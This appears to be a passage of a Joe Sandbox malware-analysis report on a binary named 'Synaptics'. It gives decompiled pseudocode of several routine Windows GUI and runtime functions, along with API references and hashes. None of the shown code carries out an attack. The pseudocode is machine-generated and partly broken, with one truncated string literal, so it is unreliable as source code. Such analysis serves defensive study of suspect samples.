				if(__edx != 0) {
					_t77 = _t77 + 0xfffffff0;
					_t25 = E00403F10(_t25, _t76);
				}
				_v5 = _t64;
				_t62 = _t25;
				E00421B3C(_t63, 0);
				_t28 =  *0x49d878; // 0x49b510
				 *((intOrPtr*)(_t28 + 4)) = _t62;
				 *_t28 = 0x45836c;
				_t29 =  *0x49d888; // 0x49b518
				 *((intOrPtr*)(_t29 + 4)) = _t62;
				 *_t29 = 0x458378;
				E00458384(_t62);
				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
				 *((intOrPtr*)(_t62 + 0x4c)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x50)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x54)) = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x58)) = E00403BBC(1);
				_t42 = E00403BBC(1);
				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
				L00407638();
				_t75 = _t42;
				L00407380();
				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
				L00407888();
				_t11 = _t62 + 0x58; // 0x45122c6e
				_t45 =  *0x49dae4; // 0x49e91c
				 *((intOrPtr*)( *_t45))(0, 0, E004547A0,  *_t11, 0, _t75, _t75, 0x5a, 0);
				 *((intOrPtr*)(_t62 + 0x84)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x88)) = E00424C3C(1);
				 *((intOrPtr*)(_t62 + 0x80)) = E00424C3C(1);
				E004587A4(_t62, _t62, _t63, _t74);
				_t15 = _t62 + 0x84; // 0x38004010
				_t56 =  *_t15;
				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
				 *((intOrPtr*)(_t56 + 8)) = 0x458680;
				_t18 = _t62 + 0x88; // 0x90000000
				_t57 =  *_t18;
				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
				 *((intOrPtr*)(_t57 + 8)) = 0x458680;
				_t21 = _t62 + 0x80; // 0x94000000
				_t58 =  *_t21;
				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
				 *((intOrPtr*)(_t58 + 8)) = 0x458680;
				_t59 = _t62;
				if(_v5 != 0) {
					E00403F68(_t59);
					_pop( *[fs:0x0]);
				}
				return _t62;
			}























                                                                                                                                                                                          0x00457fc8
                                                                                                                                                                                          0x00457fc8
                                                                                                                                                                                          0x00457fd0
                                                                                                                                                                                          0x00457fd2
                                                                                                                                                                                          0x00457fd5
                                                                                                                                                                                          0x00457fd5
                                                                                                                                                                                          0x00457fda
                                                                                                                                                                                          0x00457fdd
                                                                                                                                                                                          0x00457fe3
                                                                                                                                                                                          0x00457fe8
                                                                                                                                                                                          0x00457fed
                                                                                                                                                                                          0x00457ff0
                                                                                                                                                                                          0x00457ff6
                                                                                                                                                                                          0x00457ffb
                                                                                                                                                                                          0x00457ffe
                                                                                                                                                                                          0x00458006
                                                                                                                                                                                          0x00458012
                                                                                                                                                                                          0x00458021
                                                                                                                                                                                          0x00458030
                                                                                                                                                                                          0x0045803f
                                                                                                                                                                                          0x0045804e
                                                                                                                                                                                          0x00458058
                                                                                                                                                                                          0x0045805d
                                                                                                                                                                                          0x00458062
                                                                                                                                                                                          0x00458067
                                                                                                                                                                                          0x0045806c
                                                                                                                                                                                          0x00458071
                                                                                                                                                                                          0x00458077
                                                                                                                                                                                          0x0045807c
                                                                                                                                                                                          0x0045808a
                                                                                                                                                                                          0x00458091
                                                                                                                                                                                          0x0045809f
                                                                                                                                                                                          0x004580b1
                                                                                                                                                                                          0x004580c3
                                                                                                                                                                                          0x004580cb
                                                                                                                                                                                          0x004580d0
                                                                                                                                                                                          0x004580d0
                                                                                                                                                                                          0x004580d6
                                                                                                                                                                                          0x004580d9
                                                                                                                                                                                          0x004580e0
                                                                                                                                                                                          0x004580e0
                                                                                                                                                                                          0x004580e6
                                                                                                                                                                                          0x004580e9
                                                                                                                                                                                          0x004580f0
                                                                                                                                                                                          0x004580f0
                                                                                                                                                                                          0x004580f6
                                                                                                                                                                                          0x004580f9
                                                                                                                                                                                          0x00458100
                                                                                                                                                                                          0x00458106
                                                                                                                                                                                          0x00458108
                                                                                                                                                                                          0x0045810d
                                                                                                                                                                                          0x00458114
                                                                                                                                                                                          0x0045811d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 0045800D
                                                                                                                                                                                          • 73CCAC50.USER32(00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 00458062
                                                                                                                                                                                          • 73CCAD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0045806C
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,0044642A,00000000,00000000,?,00000000,?,00000000), ref: 00458077
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: B380KeyboardLayout
                                                                                                                                                                                          • String ID: 5B
                                                                                                                                                                                          • API String ID: 648844651-3738334870
                                                                                                                                                                                          • Opcode ID: f06d595c3e901a103d749baf538f62a4559fae39f106d35ce0652e1a7ae61c8d
                                                                                                                                                                                          • Instruction ID: 7c78f0e896318b154a236a51f14d482704da40fbffa7cbfd833c934430294294
                                                                                                                                                                                          • Opcode Fuzzy Hash: f06d595c3e901a103d749baf538f62a4559fae39f106d35ce0652e1a7ae61c8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2331EA706052049FD740EF2AD8C1B497BE5FB05319F4480BEEC08DF367DA7AA9498B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401A9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00401A9C() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push("\xef\xbf\xb				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x49e5cc);
				L004013F0();
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L004013F8();
				}
				E00401460(0x49e5ec);
				E00401460(0x49e5fc);
				E00401460(0x49e628);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x49e624 = _t11;
				if( *0x49e624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x49e624; // 0x7f2780
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x49e610)) = 0x49e60c;
					 *0x49e60c = 0x49e60c;
					 *0x49e618 = 0x49e60c;
					 *0x49e5c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401B59);
				if( *0x49e04d != 0) {
					_push(0x49e5cc);
					L00401400();
					return 0;
				}
				return 0;
			}








                                                                                                                                                                                          0x00401aa1
                                                                                                                                                                                          0x00401aa2
                                                                                                                                                                                          0x00401aa7
                                                                                                                                                                                          0x00401aaa
                                                                                                                                                                                          0x00401aad
                                                                                                                                                                                          0x00401ab2
                                                                                                                                                                                          0x00401abe
                                                                                                                                                                                          0x00401ac0
                                                                                                                                                                                          0x00401ac5
                                                                                                                                                                                          0x00401ac5
                                                                                                                                                                                          0x00401acf
                                                                                                                                                                                          0x00401ad9
                                                                                                                                                                                          0x00401ae3
                                                                                                                                                                                          0x00401aef
                                                                                                                                                                                          0x00401af4
                                                                                                                                                                                          0x00401b00
                                                                                                                                                                                          0x00401b02
                                                                                                                                                                                          0x00401b07
                                                                                                                                                                                          0x00401b07
                                                                                                                                                                                          0x00401b0f
                                                                                                                                                                                          0x00401b13
                                                                                                                                                                                          0x00401b14
                                                                                                                                                                                          0x00401b20
                                                                                                                                                                                          0x00401b23
                                                                                                                                                                                          0x00401b25
                                                                                                                                                                                          0x00401b2a
                                                                                                                                                                                          0x00401b2a
                                                                                                                                                                                          0x00401b33
                                                                                                                                                                                          0x00401b36
                                                                                                                                                                                          0x00401b39
                                                                                                                                                                                          0x00401b45
                                                                                                                                                                                          0x00401b47
                                                                                                                                                                                          0x00401b4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401b4c
                                                                                                                                                                                          0x00401b51

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,022E0208,3A6E6967,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                                          • String ID: '
                                                                                                                                                                                          • API String ID: 730355536-3744524632
                                                                                                                                                                                          • Opcode ID: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                          • Instruction ID: dfc13510ffc652cdc4745fa131ecd9d2d70f716ade9f6bddb0b8d8da957d249b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 75eea6cd1ad15cfb1e46afda1a9ce73b7035c2e84f6dcfcc3888624585293549
                                                                                                                                                                                          • Instruction Fuzzy Hash: E201AD70204240AEE716EB6B9816B153BD4D76970CF85807FF000A77F2E6BC6840CA1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004534EC Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E0043DF9C(_v8);
				_push(_t203);
				_push(0x453742);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x49e665; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0043D6F8(_v8, 0, __edx, _t204); // executed
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E0043A998(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043A9DC(_v8, _t100, _t214);
					}
					_t180 =  *0x453750; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E00452B4C(_v8, 1, 1);
						E004411C8(_v8, 1, 1, _t215);
					}
					E0043C130(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x453749);
					return E0043DFA4(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x49ebbc; // 0x22b1320
						_t22 = _t194 + 0x40; // 0x60
						if( *(_v8 + 0x25c) !=  *_t22) {
							_t155 =  *0x49ebbc; // 0x22b1320
							_t25 = _t155 + 0x40; // 0x60
							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *_t25,  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x49ebbc; // 0x22b1320
					_t28 = _t117 + 0x40; // 0x60
					 *(_v8 + 0x25c) =  *_t28;
					_t199 = E00453874(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00452B4C(_v8, _t122, _t199);
						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                                                                                                                                                          0x004534ec
                                                                                                                                                                                          0x004534ed
                                                                                                                                                                                          0x004534f4
                                                                                                                                                                                          0x004534fa
                                                                                                                                                                                          0x00453501
                                                                                                                                                                                          0x00453502
                                                                                                                                                                                          0x00453507
                                                                                                                                                                                          0x0045350a
                                                                                                                                                                                          0x00453512
                                                                                                                                                                                          0x0045351d
                                                                                                                                                                                          0x00453528
                                                                                                                                                                                          0x0045352e
                                                                                                                                                                                          0x00453530
                                                                                                                                                                                          0x0045353a
                                                                                                                                                                                          0x00453545
                                                                                                                                                                                          0x00453554
                                                                                                                                                                                          0x004536b6
                                                                                                                                                                                          0x004536b9
                                                                                                                                                                                          0x004536bf
                                                                                                                                                                                          0x004536c1
                                                                                                                                                                                          0x004536c8
                                                                                                                                                                                          0x004536c8
                                                                                                                                                                                          0x004536d0
                                                                                                                                                                                          0x004536d6
                                                                                                                                                                                          0x004536d8
                                                                                                                                                                                          0x004536df
                                                                                                                                                                                          0x004536df
                                                                                                                                                                                          0x004536e7
                                                                                                                                                                                          0x004536ed
                                                                                                                                                                                          0x004536f3
                                                                                                                                                                                          0x004536f5
                                                                                                                                                                                          0x00453704
                                                                                                                                                                                          0x00453716
                                                                                                                                                                                          0x00453716
                                                                                                                                                                                          0x00453727
                                                                                                                                                                                          0x0045372e
                                                                                                                                                                                          0x00453731
                                                                                                                                                                                          0x00453734
                                                                                                                                                                                          0x00453741
                                                                                                                                                                                          0x0045356a
                                                                                                                                                                                          0x00453574
                                                                                                                                                                                          0x0045357f
                                                                                                                                                                                          0x00453585
                                                                                                                                                                                          0x00453588
                                                                                                                                                                                          0x00453594
                                                                                                                                                                                          0x00453599
                                                                                                                                                                                          0x004535b4
                                                                                                                                                                                          0x004535b4
                                                                                                                                                                                          0x00453588
                                                                                                                                                                                          0x004535b9
                                                                                                                                                                                          0x004535be
                                                                                                                                                                                          0x004535c4
                                                                                                                                                                                          0x004535d2
                                                                                                                                                                                          0x004535d7
                                                                                                                                                                                          0x004535dd
                                                                                                                                                                                          0x004535df
                                                                                                                                                                                          0x004535e5
                                                                                                                                                                                          0x004535ee
                                                                                                                                                                                          0x00453601
                                                                                                                                                                                          0x00453610
                                                                                                                                                                                          0x0045362f
                                                                                                                                                                                          0x0045362f
                                                                                                                                                                                          0x0045363f
                                                                                                                                                                                          0x0045365e
                                                                                                                                                                                          0x0045365e
                                                                                                                                                                                          0x0045366e
                                                                                                                                                                                          0x0045368d
                                                                                                                                                                                          0x004536b0
                                                                                                                                                                                          0x004536b0
                                                                                                                                                                                          0x0045366e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004535df

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 004535AB
                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                          • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                                                                                                                                                          • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004348A8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E004348A8(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				int _t21;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x434993);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t21 = SendMessageA(E00441704( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0); // executed
					_t42 = _t21;
					if(_t42 < 0) {
						_t43 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E00404CCC( &_v12, _v8, 0x4349ac);
								goto L6;
							}
						}
					} else {
						E00404CCC( &_v12, 0x4349ac, _v8);
						L6:
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42); // executed
						_t34 = E00404E80(_v12);
						SendMessageA(E00441704( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34); // executed
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x43499a);
				return E004049C0( &_v12);
			}














                                                                                                                                                                                          0x004348b3
                                                                                                                                                                                          0x004348b6
                                                                                                                                                                                          0x004348b9
                                                                                                                                                                                          0x004348bb
                                                                                                                                                                                          0x004348bf
                                                                                                                                                                                          0x004348c0
                                                                                                                                                                                          0x004348c5
                                                                                                                                                                                          0x004348c8
                                                                                                                                                                                          0x004348cd
                                                                                                                                                                                          0x004348e4
                                                                                                                                                                                          0x004348e9
                                                                                                                                                                                          0x004348ed
                                                                                                                                                                                          0x00434918
                                                                                                                                                                                          0x0043491c
                                                                                                                                                                                          0x0043492f
                                                                                                                                                                                          0x00434936
                                                                                                                                                                                          0x00434938
                                                                                                                                                                                          0x00434945
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00434945
                                                                                                                                                                                          0x00434936
                                                                                                                                                                                          0x004348ef
                                                                                                                                                                                          0x004348fa
                                                                                                                                                                                          0x0043494a
                                                                                                                                                                                          0x0043495a
                                                                                                                                                                                          0x00434962
                                                                                                                                                                                          0x00434978
                                                                                                                                                                                          0x00434978
                                                                                                                                                                                          0x004348ed
                                                                                                                                                                                          0x0043497f
                                                                                                                                                                                          0x00434982
                                                                                                                                                                                          0x00434985
                                                                                                                                                                                          0x00434992

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 004348E4
                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00434913
                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0043492F
                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0043495A
                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 00434978
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: ffe0ecfc46be5565c031e4ce40711d918fc9cf30ddcbd8c6808e49f6dfa3db42
                                                                                                                                                                                          • Instruction ID: 60fe2270a456efbc5898118594648b470be5076c4c12df513f5ffd0388d1f25b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ffe0ecfc46be5565c031e4ce40711d918fc9cf30ddcbd8c6808e49f6dfa3db42
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5219BB1644704ABE710ABB6CC82F9B76ACEF84718F10453EB501A73D2DB78BD00C559
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00454A44 Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00454A44(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x454c0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E0044E3BC(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E00421C0C(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E00441A08(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E00441704(_t92), 0); // executed
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E00441A08(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E00441704(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E00441A08(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E00441704(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E00441704(_t92), _t70);
								}
								E0044E3BC(_t113, E00441704(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00455B08(_t92, 1);
							}
							E0045497C(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x454c11);
							return E004049C0( &_v20);
						}
					}
				}
				_t77 =  *0x49ebbc; // 0x22b1320
				_t79 = E00458274(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x49ebbc; // 0x22b1320
						if(_t113 ==  *((intOrPtr*)(E00458260(_t81, _t111) + 0x248))) {
							_t83 =  *0x49ebbc; // 0x22b1320
							if(_t92 != E00458260(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x49d8b4; // 0x423118
								E00406A70(_t87,  &_v20);
								E0040D180(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00404378();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                                                                                                                                                                          0x00454a44
                                                                                                                                                                                          0x00454a4c
                                                                                                                                                                                          0x00454a4f
                                                                                                                                                                                          0x00454a52
                                                                                                                                                                                          0x00454a54
                                                                                                                                                                                          0x00454a58
                                                                                                                                                                                          0x00454a59
                                                                                                                                                                                          0x00454a5e
                                                                                                                                                                                          0x00454a61
                                                                                                                                                                                          0x00454a66
                                                                                                                                                                                          0x00454ad8
                                                                                                                                                                                          0x00454ad8
                                                                                                                                                                                          0x00454ae0
                                                                                                                                                                                          0x00454ae4
                                                                                                                                                                                          0x00454ae4
                                                                                                                                                                                          0x00454aed
                                                                                                                                                                                          0x00454af9
                                                                                                                                                                                          0x00454af9
                                                                                                                                                                                          0x00454afb
                                                                                                                                                                                          0x00454b03
                                                                                                                                                                                          0x00454b09
                                                                                                                                                                                          0x00454b09
                                                                                                                                                                                          0x00454b10
                                                                                                                                                                                          0x00454bc3
                                                                                                                                                                                          0x00454bc8
                                                                                                                                                                                          0x00454bca
                                                                                                                                                                                          0x00454bd6
                                                                                                                                                                                          0x00454bd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00454b29
                                                                                                                                                                                          0x00454b33
                                                                                                                                                                                          0x00454b42
                                                                                                                                                                                          0x00454b9c
                                                                                                                                                                                          0x00454ba3
                                                                                                                                                                                          0x00454ba7
                                                                                                                                                                                          0x00454bac
                                                                                                                                                                                          0x00454bae
                                                                                                                                                                                          0x00454bba
